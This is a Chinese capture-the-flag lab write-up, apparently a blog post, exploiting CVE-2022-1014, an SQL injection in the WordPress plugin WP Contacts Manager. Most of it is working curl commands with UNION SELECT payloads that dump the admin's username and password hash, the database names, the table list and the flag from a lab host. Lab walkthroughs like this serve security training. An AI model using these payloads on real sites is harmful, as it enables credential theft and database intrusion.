CVE-2022-1014

根据提示wordpress插件 WP Contacts Manager <= 2.2.4 对用户输入的转义不够充分,导致了SQL注入。

找到sql注入漏洞点:

/wp-admin/admin-ajax.php?action=WP_Contacts_Manager_call&type=get-contact

访问:/wp-admin/admin-ajax.php?action=WP_Contacts_Manager_call&type=get-contact

通过信息收集获取exp

curl http://eci-2ze1t6k1q65z3s0hanxw.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action

=WP_Contacts_Manager_call&type=get-contact

 --data

'{"id":"1\u0027 UNION ALL SELECT 1,(SELECT user_login FROM wp_users WHERE ID = 1),(SELECT user_pass FROM wp_users WHERE ID = 1),4,5,6,7,8,9,0,1,2; -- "}'

获取当前用户和数据库

curl 'http://eci-2ze1t6k1q65z3s0hanxw.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action

=WP_Contacts_Manager_call&type=get-contact'\

--data

'{"id":"1\u0027 UNION ALL SELECT 1,(SELECT user()),(SELECT database()),4,5,6,7,8,9,0,1,2; -- "}'

获取当前数据库所有表

curl 'http://eci-2ze1t6k1q65z3s0hanxw.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action

=WP_Contacts_Manager_call&type=get-contact'\

--data

'{"id":"1\u0027 UNION ALL SELECT 1,2,(SELECT group_concat(table_name) from information_schema.tables where table_schema=database()),4,5,6,7,8,9,0,1,2; -- "}' 

获取flag

curl 'http://eci-2ze1t6k1q65z3s0hanxw.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action

=WP_Contacts_Manager_call&type=get-contact'\

--data

'{"id":"1\u0027 UNION ALL SELECT 1,2,(SELECT group_concat(flag)from flag),4,5,6,7,8,9,0,1,2; -- "}' 

得到flag:flag{367f9589-5515-4c04-8704-7613e2471d7e}

评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值